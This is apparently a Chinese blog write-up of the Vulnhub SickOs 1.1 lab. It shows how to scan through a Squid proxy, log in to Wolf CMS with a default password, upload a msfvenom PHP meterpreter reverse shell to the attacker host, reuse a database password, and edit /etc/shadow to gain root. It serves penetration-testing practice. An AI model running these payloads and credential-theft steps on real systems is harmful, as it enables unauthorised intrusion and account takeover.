sickos 1.1

0507

实验环境

攻击者 Kali 192.168.192.128

受害者 sickos1.1 IP未知

攻击者和受害者在同一网段

 

1. 信息收集

nmap -sn 192.168.192.0/24

受害者IP为 192.168.192.159

 

收集受害者服务详情

nmap -sV -A 192.168.192.159

22/tcp open ssh OpenSSH 5.9p1 Debian 5ubuntu1.1 (Ubuntu Linux; protocol 2.0)

3128/tcp open http-proxy Squid http proxy 3.1.19
|_http-title: ERROR: The requested URL could not be retrieved
|_http-server-header: squid/3.1.19

8080/tcp closed http-proxy

 

我们看到有3128的Squid代理服务

https://book.hacktricks.xyz/network-services-pentesting/3128-pentesting-squid

使用专门的扫描工具来扫描

python spose.py --proxy http://192.168.192.159:3128 --target 192.168.192.159

屏幕截图 2024-02-18 153322

80端口是开着的 但我们要用代理来访问

 

firefox 设置代理

屏幕截图 2024-02-18 153458

所以我们要借助代理来扫描

 

首先nikto

nikto -host=http://192.168.192.159:3128

屏幕截图 2024-02-18 153006

有个robots.txt

屏幕截图 2024-02-18 153528

屏幕截图 2024-02-18 153558

 

FUZZ测试

export URL="http://192.168.192.159/wolfcms/FUZZ" 

#模糊测试目录 排除404网页
wfuzz -c -z file,/usr/share/seclists/Discovery/Web-Content/raft-large-directories.txt --hc 404 "$URL"

#模糊测试文件 排除404网页
wfuzz -c -z file,/usr/share/seclists/Discovery/Web-Content/raft-large-files.txt --hc 404 "$URL"

有几个有意思的页面 但访问过去是空的

 

2. 漏洞发现和利用

上Google查一下 WolfCMS的URL和默认密码

http://192.168.192.159/wolfcms/?/admin/login

用一下弱密码

用户名admin 密码admin就进去了

 

到files里面 发现可以上传文件

屏幕截图 2024-02-18 154120

猜测是文件上传漏洞

 

制作木马

msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.192.128 LPORT=3333 -o payload.php

 

metasploit监听

msfconsole -q
use exploit/multi/handler
set payload php/meterpreter/reverse_tcp
set lhost 192.168.192.128
set lport 3333
exploit

 

上传木马

屏幕截图 2024-02-18 154500

发现文件都上传到public目录中

http://192.168.192.159/wolfcms/public/

 

点击payload.php过后meterpreter就到了

屏幕截图 2024-02-18 154628

 

3. 后渗透阶段

先拿到交互式shell

meterpreter > shell

python -c 'import pty; pty.spawn("/bin/bash")'

 

看一下版本信息和内核信息

uname -a

cat /etc/*-release

屏幕截图 2024-02-18 155649

测试了一下不能内核提权

 

看一下网络信息

netstat -antlp

屏幕截图 2024-02-18 155943

数据库监听在本地

 

我们找一下能不能找到用户名和密码

首先还是到网站根目录

cd /var/www/wolfcms

cat config.php

屏幕截图 2024-02-18 160111

用户名是root和john@123

 

看完数据库之后发现都是已经知道的信息

屏幕截图 2024-02-18 160206

 

去家目录看看

cd /home

ls -al
total 12
drwxr-xr-x  3 root   root   4096 Sep 22  2015 .
drwxr-xr-x 22 root   root   4096 Sep 22  2015 ..
drwxr-xr-x  3 sickos sickos 4096 Feb 18 12:40 sickos

发现一个sickos的用户 不知道密码

 

经过尝试 哪个john@123是sickos的密码 无厘头的设计

登录sickos账号

su sickos

看一下家目录 没有什么有意思的

 

看一下权限

sickos@SickOs:~$ sudo -l
sudo -l
[sudo] password for sickos: john@123

Matching Defaults entries for sickos on this host:
    env_reset,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User sickos may run the following commands on this host:
    (ALL : ALL) ALL

竟然什么权限都有 只要sudo + 命令就是root权限来操作了

那我们就可以改/etc/shadow了 

 

查看一下/etc/shadow

屏幕截图 2024-02-18 160600

现在我们直到sickos的密码了 那我们就把root密码改成sickos的密码 这样我们就能用john@123来登录root账号

 

把root划线划线的部分删除改成sickos划线的那一个部分

 

然后登录root用户

用户名root 密码john@123

我们到此就提权成功了

 

查看/root目录 就得到了flag

屏幕截图 2024-02-18 160853

实验结束

© 版权声明
文章版权归作者所有,未经允许请勿转载。
THE END
Vulnhub
喜欢就支持一下吧
点赞7 分享
zhyann的头像-白鸢的笔记钻石会员
Active Directory Introduction and Enumeration 2-白鸢的笔记
Active Directory Introduction and Enumeration 2
Active Directory Introduction and Enumeration 2
1年前 182
winPEAS使用 利用有缺陷的注册表权限提权-白鸢的笔记
winPEAS使用 利用有缺陷的注册表权限提权
winPEAS使用 利用有缺陷的注册表权限提权
1年前 150
使用自动化脚本实现Linux信息收集工作-白鸢的笔记
使用自动化脚本实现Linux信息收集工作
使用自动化脚本实现Linux信息收集工作
2年前 138
NTLM认证-白鸢的笔记
NTLM认证
NTLM认证
11个月前 133
Exghost ftp爆破 curl上传-白鸢的笔记
Exghost ftp爆破 curl上传
Exghost ftp爆破 curl上传
11个月前 123
判断语句的嵌套-白鸢的笔记
判断语句的嵌套
判断语句的嵌套
2年前 118
相关推荐
DC-6-白鸢的笔记
DC-6
DC-6
1年前 95
w34kn3ss OpenSSL 0.9.8c-1 < 0.9.8g-9漏洞 python反编译-白鸢的笔记
w34kn3ss OpenSSL 0.9.8c-1 < 0.9.8g-9漏洞 python反编译
w34kn3ss OpenSSL 0.9.8c-1 < 0.9.8g-9漏洞 python反编译
10个月前 90
Vulnhub-DC2-白鸢的笔记
Vulnhub-DC2
Vulnhub-DC2
2年前 86
Symfonos:1 SMTP日志毒化-白鸢的笔记
Symfonos:1 SMTP日志毒化
Symfonos:1 SMTP日志毒化
10个月前 83
Vulnhub-DC1-白鸢的笔记
Vulnhub-DC1
Vulnhub-DC1
2年前 81
vulnhub Joy 网络枚举 ftp挂载-白鸢的笔记
vulnhub Joy 网络枚举 ftp挂载
vulnhub Joy 网络枚举 ftp挂载
10个月前 80
评论 抢沙发
头像
欢迎您留下宝贵的见解!
提交
头像

昵称

取消
昵称

请填写用户信息:

  • 昵称(必填)
  • 邮箱(必填)
表情
[aoman][baiyan][bishi][bizui][cahan][ciya][dabing][daku][deyi][doge][fadai][fanu][fendou][ganga][guzhang][haixiu][hanxiao][zuohengheng][zhuakuang][zhouma][zhemo][zhayanjian][zaijian][yun][youhengheng][yiwen][yinxian][xu][xieyanxiao][xiaoku][xiaojiujie][xia][wunai][wozuimei][weixiao][weiqu][tuosai][tu][touxiao][tiaopi][shui][se][saorao][qiudale][se][qinqin][qiaoda][piezui][penxue][nanguo][liulei][liuhan][lenghan][leiben][kun][kuaikule][ku][koubi][kelian][keai][jingya][jingxi][jingkong][jie][huaixiao][haqian][aini][OK][qiang][quantou][shengli][woshou][gouyin][baoquan][aixin][bangbangtang][xiaoyanger][xigua][hexie][pijiu][lanqiu][juhua][hecai][haobang][caidao][baojin][chi][dan][kulou][shuai][shouqiang][yangtuo][youling]
代码

请输入代码:

确认
图片